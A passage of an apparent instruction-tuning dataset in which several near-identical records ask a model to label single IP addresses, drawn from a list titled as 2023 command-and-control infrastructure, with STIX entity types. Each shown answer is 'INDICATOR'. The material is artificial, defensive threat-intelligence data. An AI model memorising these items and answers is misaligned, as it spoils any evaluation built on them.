31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n199.247.8.115\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n192.248.154.154\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n165.232.77.197\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n157.245.69.118\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.188.13\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
